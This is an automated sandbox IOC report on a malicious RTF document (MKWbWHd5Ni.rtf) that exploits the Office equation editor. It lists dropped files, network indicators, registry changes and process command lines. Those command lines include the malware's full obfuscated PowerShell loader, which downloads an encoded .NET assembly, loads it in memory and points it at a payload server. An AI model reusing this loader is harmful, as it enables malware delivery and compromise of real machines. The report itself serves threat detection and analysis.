IOC Report
MKWbWHd5Ni.rtf

loading gif

Files

File Path
Type
Category
Malicious
MKWbWHd5Ni.rtf
Rich Text Format data, version 1
initial sample
malicious
C:\Users\user\AppData\Roaming\picturewithgetmebackgreatdayfo.vBS
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\picturewithgetmebackgreatdayfor[1].tiff
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\json[1].json
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{83B69669-2410-45AC-9160-6842B06747CE}.tmp
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{1695B26C-F1F1-49DB-AA4B-EDEA56D67046}.tmp
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{97B5E60D-A849-4525-97A9-7E264DBC62FC}.tmp
data
dropped
C:\Users\user\AppData\Local\Temp\bhvD26D.tmp
Extensible storage engine DataBase, version 0x620, checksum 0x3bb10206, page size 32768, DirtyShutdown, Windows version 6.1
dropped
C:\Users\user\AppData\Local\Temp\ccmujxud.fha.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\ml5wg04c.4ej.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\ptdercjwijh
Unicode text, UTF-16, little-endian text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\strdc0nh.qvk.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\uubjufot.q1f.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\MKWbWHd5Ni.LNK
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Aug 11 15:42:09 2023, mtime=Fri Aug 11 15:42:09 2023, atime=Sat Oct 5 11:58:10 2024, length=108417, window=hide
dropped
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
Generic INItialization configuration [folders]
dropped
C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
data
dropped
C:\Users\user\Desktop\~$WbWHd5Ni.rtf
data
dropped
There are 9 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
malicious
C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
malicious
C:\Windows\SysWOW64\wscript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\picturewithgetmebackgreatdayfo.vBS"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiggJFZlUmJvc2VQUkVmRVJFTmNFLlRvU3RSaW5HKClbMSwzXSsneCctSm9pbicnKSggKCdnJysnMjgnKyd1cmwnKycgPScrJyBzZzFodHQnKydwJysnczovL3Jhdy4nKydnaScrJ3RodWJ1JysncycrJ2VyYycrJ28nKyduJysndGUnKydudC5jb20nKycvTicrJ28nKydEZScrJ3RlYycrJ3RPbicrJy9Ob0QnKydlJysndGVjdE9uL3JlZnMvaGUnKydhZHMvbWFpbi8nKydEZXQnKydhaCcrJ05vJysndGgtJysnVi50eHRzZzE7JysnIGcyJysnOCcrJ2InKydhc2U2JysnNENvbnQnKydlJysnbicrJ3QgPScrJyAnKycoTmV3LU9iaicrJ2VjdCBTeXN0ZW0uTicrJ2UnKyd0LldlJysnYicrJ0NsaWVuJysndCcrJykuJysnRCcrJ293bmxvJysnYScrJ2RTJysndHJpbicrJ2coZzI4dXJsKTsgJysnZzInKyc4YmluYScrJ3J5Q29udCcrJ2UnKyduJysndCA9IFtTeXN0ZW0uJysnQ29udmVydF06OkZyb20nKydCJysnYXNlJysnNjQnKydTdCcrJ3JpbmcoZzInKyc4YmFzZTY0JysnQ28nKyduJysndGUnKydudCknKyc7ICcrJ2cyOCcrJ2FzJysnc2VtYmx5ICcrJz0nKycgWycrJ1JlZicrJ2xlJysnYycrJ3QnKydpb24nKycuQScrJ3NzZW1ibHknKyddOjpMb2FkJysnKGcyOGJpbmFyJysneUNvJysnbnQnKydlbnQpOyBbZG5saWIuSU8uSCcrJ28nKydtZV06OlYnKydBSScrJyhoJysnRGonKyd0eHQuRkZSJysnUkVXLycrJzAnKyc1Ni8zJysnMTEnKycuMScrJzUyLjMnKyc4JysnLjE1Ly86JysncCcrJ3R0JysnaGhEJysnaiwgaCcrJ0QnKydqJysnZGUnKydzYXRpdicrJ2FkJysnb2hEaicrJywgaEQnKydqZCcrJ2VzYXQnKydpJysndmFkJysnb2hEaiwgaERqZCcrJ2UnKydzJysnYXQnKydpdmFkJysnb2hEaiwnKycgJysnaERqUicrJ2VnQXNtaEQnKydqJysnLCBoRGpoRGosJysnaCcrJ0QnKydqaERqJysnKScpLlJlcExhQ0UoJ2hEaicsW1N0UklOZ11bQ0hBcl0zNCkuUmVwTGFDRSgnZzI4JywnJCcpLlJlcExhQ0UoJ3NnMScsW1N0UklOZ11bQ0hBcl0zOSkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "&( $VeRbosePREfERENcE.ToStRinG()[1,3]+'x'-Join'')( ('g'+'28'+'url'+' ='+' sg1htt'+'p'+'s://raw.'+'gi'+'thubu'+'s'+'erc'+'o'+'n'+'te'+'nt.com'+'/N'+'o'+'De'+'tec'+'tOn'+'/NoD'+'e'+'tectOn/refs/he'+'ads/main/'+'Det'+'ah'+'No'+'th-'+'V.txtsg1;'+' g2'+'8'+'b'+'ase6'+'4Cont'+'e'+'n'+'t ='+' '+'(New-Obj'+'ect System.N'+'e'+'t.We'+'b'+'Clien'+'t'+').'+'D'+'ownlo'+'a'+'dS'+'trin'+'g(g28url); '+'g2'+'8bina'+'ryCont'+'e'+'n'+'t = [System.'+'Convert]::From'+'B'+'ase'+'64'+'St'+'ring(g2'+'8base64'+'Co'+'n'+'te'+'nt)'+'; '+'g28'+'as'+'sembly '+'='+' ['+'Ref'+'le'+'c'+'t'+'ion'+'.A'+'ssembly'+']::Load'+'(g28binar'+'yCo'+'nt'+'ent); [dnlib.IO.H'+'o'+'me]::V'+'AI'+'(h'+'Dj'+'txt.FFR'+'REW/'+'0'+'56/3'+'11'+'.1'+'52.3'+'8'+'.15//:'+'p'+'tt'+'hhD'+'j, h'+'D'+'j'+'de'+'sativ'+'ad'+'ohDj'+', hD'+'jd'+'esat'+'i'+'vad'+'ohDj, hDjd'+'e'+'s'+'at'+'ivad'+'ohDj,'+' '+'hDjR'+'egAsmhD'+'j'+', hDjhDj,'+'h'+'D'+'jhDj'+')').RepLaCE('hDj',[StRINg][CHAr]34).RepLaCE('g28','$').RepLaCE('sg1',[StRINg][CHAr]39))"
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\ptdercjwijh"
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\rvipsuupwrzfhg"
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\cpnhtnerszrskmtpxa"
malicious
C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
malicious

URLs

Name
IP
Malicious
cavps7.duckdns.org
malicious
http://51.83.251.113/650/WERRFF.txt
51.83.251.113
malicious
http://51.83.251.113/650/picturewithgetmebackgreatdayfor.tIF
51.83.251.113
malicious
http://b.scorecardresearch.com/beacon.js
unknown
http://acdn.adnxs.com/ast/ast.js
unknown
http://www.imvu.comr
unknown
http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_167%2Cw_312%2Cc_fill%2Cg_faces%2Ce_
unknown
http://ocsp.entrust.net03
unknown
https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1
unknown
https://contoso.com/License
unknown
https://support.google.com/chrome/?p=plugin_flash
unknown
http://cdn.taboola.com/libtrc/static/thumbnails/f539211219b796ffbb49949997c764f0.png
unknown
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
unknown
http://www.diginotar.nl/cps/pkioverheid0
unknown
https://cvision.media.net/new/286x175/2/137/169/197/852af93e-e705-48f1-93ba-6ef64c8308e6.jpg?v=9
unknown
http://acdn.adnxs.com/ib/static/usersync/v3/async_usersync.html
unknown
http://www.nirsoft.net
unknown
https://deff.nelreports.net/api/report?cat=msn
unknown
https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.js
unknown
http://go.micros
unknown
http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
unknown
http://cache.btrll.com/default/Pix-1x1.gif
unknown
http://pr-bh.ybp.yahoo.com/sync/msft/1614522055312108683
unknown
https://www.google.com
unknown
http://geoplugin.net/json.gp/C
unknown
http://o.aolcdn.com/ads/adswrappermsni.js
unknown
http://cdn.taboola.com/libtrc/msn-home-network/loader.js
unknown
http://www.msn.com/?ocid=iehp
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://www.msn.com/en-us/homepage/secure/silentpassport?secure=false&lc=1033
unknown
http://static.chartbeat.com/js/chartbeat.js
unknown
http://www.msn.com/de-de/?ocid=iehp
unknown
http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_90%2Cw_120%2Cc_fill%2Cg_faces:auto%
unknown
https://login.yahoo.com/config/login
unknown
https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txtsg1;
unknown
http://www.nirsoft.net/
unknown
http://ocsp.entrust.net0D
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://contextual.media.net/803288796/fcmain.js?&gdpr=1&cid=8CUT39MWR&cpcd=2K6DOtg60bLnBhB3D4RSbQ%3
unknown
http://p.rfihub.com/cm?in=1&pub=345&userid=1614522055312108683
unknown
http://51.83.251.113
unknown
http://ib.adnxs.com/pxj?bidder=18&seg=378601&action=setuids(
unknown
https://cvision.media.net/new/286x175/3/72/42/210/948f45db-f5a0-41ce-a6b6-5cc9e8c93c16.jpg?v=9
unknown
http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_80%2Ch_334%2Cw_312%2Cc_fill%2Cg_faces%2Ce_sh
unknown
https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt
185.199.111.133
http://cdn.taboola.com/libtrc/impl.thin.277-63-RELEASE.js
unknown
http://nuget.org/NuGet.exe
unknown
https://www.ccleaner.com/go/app_cc_pro_trialkey
unknown
http://crl.entrust.net/server1.crl0
unknown
http://51.83.251.113/650/picturewithgetmebackgreatdayfor.tIFj
unknown
https://contextual.media.net/8/nrrV73987.js
unknown
http://www.imvu.com
unknown
https://contoso.com/Icon
unknown
https://contextual.media.net/
unknown
http://widgets.outbrain.com/external/publishers/msn/MSNIdSync.js
unknown
https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2
unknown
http://www.msn.com/
unknown
https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au
unknown
http://geoplugin.net/json.gp
178.237.33.50
http://www.imvu.com/GK
unknown
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
unknown
https://dc.ads.linkedin.com/collect/?pid=6883&opid=7850&fmt=gif&ck=&3pc=true&an_user_id=591650497549
unknown
https://raw.githubusercontent.com
unknown
http://cdn.at.atwola.com/_media/uac/msn.html
unknown
http://go.microsoft.c
unknown
https://www.google.com/accounts/servicelogin
unknown
http://dis.criteo.com/dis/usersync.aspx?r=7&p=3&cp=appnexus&cu=1&url=http%3A%2F%2Fib.adnxs.com%2Fset
unknown
https://secure.comodo.com/CPS0
unknown
https://policies.yahoo.com/w3c/p3p.xml
unknown
http://crl.entrust.net/2048ca.crl0
unknown
http://www.msn.com/advertisement.ad.js
unknown
http://www.ebuddy.com
unknown
There are 63 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
cavps7.duckdns.org
84.32.44.139
malicious
raw.githubusercontent.com
185.199.111.133
geoplugin.net
178.237.33.50

IPs

IP
Domain
Country
Malicious
51.83.251.113
unknown
France
malicious
84.32.44.139
cavps7.duckdns.org
Lithuania
malicious
178.237.33.50
geoplugin.net
Netherlands
185.199.111.133
raw.githubusercontent.com
Netherlands

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
Blob
malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
Blob
malicious
HKEY_CURRENT_USER\Software\Rmc-43JG4A
exepath
malicious
HKEY_CURRENT_USER\Software\Rmc-43JG4A
licence
malicious
HKEY_CURRENT_USER\Software\Rmc-43JG4A
time
malicious
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
%*/
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Outlook\Journaling\Microsoft Word
Enabled
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word
MTTT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
=+/
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
e,/
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\ReviewCycle
ReviewToken
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\DocumentRecovery\29694
29694
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Arial Unicode MS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Batang
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@BatangChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@DFKai-SB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Dotum
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@DotumChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@FangSong
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Gulim
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@GulimChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Gungsuh
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@GungsuhChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@KaiTi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Malgun Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Meiryo
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Meiryo UI
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Microsoft JhengHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Microsoft YaHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MingLiU
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MingLiU_HKSCS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MingLiU_HKSCS-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MingLiU-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS Mincho
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS PGothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS PMincho
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS UI Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@NSimSun
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@PMingLiU
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@PMingLiU-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@SimHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@SimSun
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@SimSun-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Agency FB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Aharoni
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Algerian
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Andalus
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Angsana New
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
AngsanaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Aparajita
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arabic Typesetting
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Black
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Narrow
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Rounded MT Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Unicode MS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Baskerville Old Face
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Batang
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
BatangChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bauhaus 93
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bell MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Berlin Sans FB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Berlin Sans FB Demi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bernard MT Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Blackadder ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT Black
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT Poster Compressed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Book Antiqua
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bookman Old Style
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bookshelf Symbol 7
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bradley Hand ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Britannic Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Broadway
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Browallia New
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
BrowalliaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Brush Script MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Calibri
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Calibri Light
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Californian FB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Calisto MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cambria
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cambria Math
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Candara
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Castellar
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Centaur
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Century
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Century Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Century Schoolbook
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Chiller
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Colonna MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Comic Sans MS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Consolas
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Constantia
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cooper Black
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Copperplate Gothic Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Copperplate Gothic Light
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Corbel
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cordia New
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
CordiaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Courier New
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Curlz MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DaunPenh
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
David
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DFKai-SB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DilleniaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DokChampa
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Dotum
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DotumChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Ebrima
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Edwardian Script ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Elephant
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Engravers MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Bold ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Demi ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Light ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Medium ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Estrangelo Edessa
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
EucrosiaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Euphemia
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
FangSong
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Felix Titling
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Footlight MT Light
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Forte
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Book
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Demi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Demi Cond
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Heavy
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Medium
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Medium Cond
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
FrankRuehl
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
FreesiaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Freestyle Script
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
French Script MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gabriola
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Garamond
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gautami
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Georgia
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gigi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans MT Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans MT Ext Condensed Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans Ultra Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans Ultra Bold Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gisha
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gloucester MT Extra Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Goudy Old Style
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Goudy Stout
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gulim
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
GulimChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gungsuh
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
GungsuhChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Haettenschweiler
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Harlow Solid Italic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Harrington
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
High Tower Text
